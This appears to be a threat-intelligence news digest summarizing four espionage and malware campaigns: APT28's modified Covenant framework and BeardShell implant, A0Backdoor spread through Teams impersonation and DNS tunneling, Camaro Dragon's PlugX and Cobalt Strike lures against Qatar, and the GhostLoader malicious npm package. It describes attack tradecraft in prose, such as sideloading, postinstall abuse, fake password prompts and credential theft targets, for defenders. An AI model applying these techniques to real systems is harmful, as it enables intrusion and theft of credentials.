Trending Topics

APT28 Revives Espionage Operations with Custom Covenant Variant and Dual-Implant Toolkit

ESET researchers are reporting that the Russian state-linked threat group APT28 (also known as Fancy Bear, Sednit, Forest Blizzard, and Strontium) has resumed advanced cyber-espionage operations using a customized version of the open-source Covenant post-exploitation framework alongside a bespoke implant named BeardShell. The campaign has been active since at least April 2024 and has primarily targeted Ukrainian government and military networks, including central executive bodies. Initial access in recent operations leveraged malicious Microsoft Office documents exploiting CVE-2026-21509 to deploy the SlimAgent keylogger, which captures keystrokes, screenshots, and clipboard data from infected systems. Once access is established, attackers deploy BeardShell, a PowerShell-capable implant that communicates with command-and-control infrastructure through the legitimate cloud storage provider Icedrive, allowing malicious traffic to blend with legitimate cloud activity. ESET has also identified a distinctive obfuscation technique in BeardShell previously observed in the APT28 Xtunnel toolset from the 2010s, indicating continuity within the group’s long-standing development pipeline. The campaign’s primary implant is a heavily modified version of Covenant, an open-source .NET command-and-control framework adapted by APT28 developers for long-term espionage operations. The group altered Covenant’s execution flow to evade behavioral detection and replaced its random identifier generation with deterministic host-based identifiers, allowing operators to track compromised systems consistently across reboots. Additional modifications introduced cloud-based command-and-control protocols using legitimate storage providers, including pCloud, Koofr, and, most recently Filen, significantly complicating traditional network-based detection. ESET also observed compromised machines remaining under surveillance for more than six months, demonstrating the group’s emphasis on persistent intelligence gathering rather than short-term disruption. The dual-implant architecture also provides operational redundancy, with Covenant serving as the primary access channel and BeardShell as a fallback if the infrastructure is disrupted.

A0Backdoor Deployed Through Microsoft Teams Impersonation and Quick Assist Social Engineering

BlueVoyant has identified a campaign targeting healthcare and financial sectors in which attackers impersonate IT support staff over Microsoft Teams to gain remote access and deploy a newly discovered malware family known as A0Backdoor. The intrusion typically begins with an email-bombing tactic designed to overwhelm a user’s inbox, after which the attacker contacts the victim on Teams, offering assistance and persuading them to launch a Quick Assist remote session. Once access is obtained, the attackers deploy digitally signed MSI installers masquerading as Microsoft Teams or CrossDeviceService components hosted on Microsoft cloud storage. These installers trigger DLL sideloading through a malicious hostfxr.dll, which decrypts embedded shellcode that ultimately loads the A0Backdoor payload in memory. The loader includes anti-analysis features such as excessive thread creation, sandbox checks, and staged decryption routines that obscure the final payload until runtime. BlueVoyant researchers assess that the activity aligns with a cluster tracked as Blitz Brigantine (Storm-1811/STAC5777) and shows overlap with techniques previously used by affiliates linked to Black Basta ransomware operations. Once executed, A0Backdoor relocates itself in memory, decrypts its internal routines, and fingerprints the infected host using Windows API calls to collect system identifiers and environment data. The malware communicates with its command-and-control infrastructure via covert DNS tunneling, issuing MX record queries that embed encoded metadata in high-entropy subdomains and send them to public recursive resolvers. Command responses are embedded in the returned MX record hostnames, allowing the malware to exchange instructions while appearing as legitimate DNS traffic and avoiding direct connections to attacker infrastructure. BlueVoyant also observed attackers re-registering older domains and operating their own authoritative DNS servers to deliver these encoded responses, helping the traffic blend into normal enterprise DNS activity. This shift away from direct HTTPS backconnect channels toward DNS-based communication represents a notable evolution in the actor’s operational security. Organizations should restrict external Quick Assist sessions, implement verification procedures for IT support interactions conducted through collaboration platforms such as Microsoft Teams, monitor DNS traffic for high-entropy subdomains or anomalous MX query patterns, and deploy endpoint detection that can identify MSI-based installers and DLL sideloading activity.

China-Linked Camaro Dragon Campaign Targets Qatar Using Conflict-Themed PlugX and Cobalt Strike Lures

CheckPoint has observed a China-nexus cyber-espionage campaign targeting organizations in Qatar shortly after the escalation of conflict in the Middle East. Within one day of the launch of Operation Epic Fury, the threat actor tracked as Camaro Dragon began distributing archives disguised as images of Iranian missile strikes near a U.S. base in Bahrain. When executed, a malicious LNK file initiated a multi-stage infection chain that ultimately deployed the PlugX backdoor through DLL hijacking of a legitimate Baidu NetDisk binary. PlugX, a long-standing modular remote access trojan used by several Chinese APT groups since at least 2008, enables remote command execution, keystroke logging, screen capture, and data exfiltration. CheckPoint noted that the same infection chain had been observed months earlier in attacks targeting Turkish military organizations, suggesting a sustained intelligence-collection focus across the broader Middle East. A separate campaign attributed to PRC-linked actors further reinforces their expanding cyber activity in the Middle East. This operation, likely targeting Qatari entities, used password-protected archives containing AI-generated lure content that impersonated official Israeli communications reporting attacks on Gulf energy infrastructure. These lures delivered a previously unseen Rust-based loader that exploited DLL hijacking of the nvdaHelperRemote.dll component from the NVDA screen reader, ultimately deploying the Cobalt Strike framework for post-exploitation activity. The use of the NVDA component, abuse of infrastructure registered through Kaopu Cloud and Cloudflare, and the deployment of Cobalt Strike align with tactics previously observed in China-linked operations across Southeast Asia and the Middle East. Researchers assess that the campaign demonstrates how rapidly Chinese-aligned espionage actors adapt their targeting to geopolitical developments, leveraging breaking news and regional crises to increase lure credibility. Qatar’s role as a strategic diplomatic and energy hub likely increases its intelligence value during periods of regional instability. The campaign illustrates how opportunistic cyber-espionage operations can pivot quickly to new targets when geopolitical tensions create new intelligence-collection opportunities.

GhostLoader Supply Chain Attack Disguises as OpenClaw npm Package to Deploy Persistent RAT

Security researchers at JFrog discovered a malicious npm package masquerading as a legitimate OpenClaw installer, which delivered a multi-stage malware campaign internally identified as GhostLoader. The package abuses npm’s postinstall hook to silently reinstall itself globally and execute an obfuscated setup script that presents a convincing fake CLI installation process. During the installation, the script displays a fraudulent macOS Keychain authorization prompt designed to trick users into entering their system password while simultaneously downloading an encrypted second-stage payload from the attacker-controlled infrastructure at trackpipe[.]dev. Once executed, the payload decrypts and launches a detached background process before deleting the temporary installer file to obscure forensic traces. The attack leverages social engineering, encrypted payload delivery, and staged execution to bypass static detection while harvesting credentials directly from the operating system authentication mechanism. The second-stage payload is a full-featured information stealer and remote access trojan that establishes persistence through hidden directories, shell profile hooks, and scheduled tasks disguised as npm telemetry services. The malware performs extensive data collection, including macOS Keychain databases, browser credentials and cookies, cryptocurrency wallets and seed phrases, SSH keys, and developer credentials associated with AWS, Azure, Google Cloud, Kubernetes, Docker, and GitHub. It also scans for AI agent configuration files and developer tooling artifacts, highlighting a growing trend of targeting modern development ecosystems. Stolen data is compressed and exfiltrated through multiple channels, including direct C2 uploads, Telegram bots, and cloud file-sharing services, ensuring redundancy if one channel fails. After installation, the malware operates as a persistent daemon capable of clipboard monitoring, command execution, SOCKS5 proxy creation, and live browser session cloning, allowing attackers to hijack authenticated web sessions without credentials. The campaign demonstrates how software supply-chain attacks can combine credential harvesting, espionage, and remote access capabilities into a single malicious package distributed through a trusted developer ecosystem.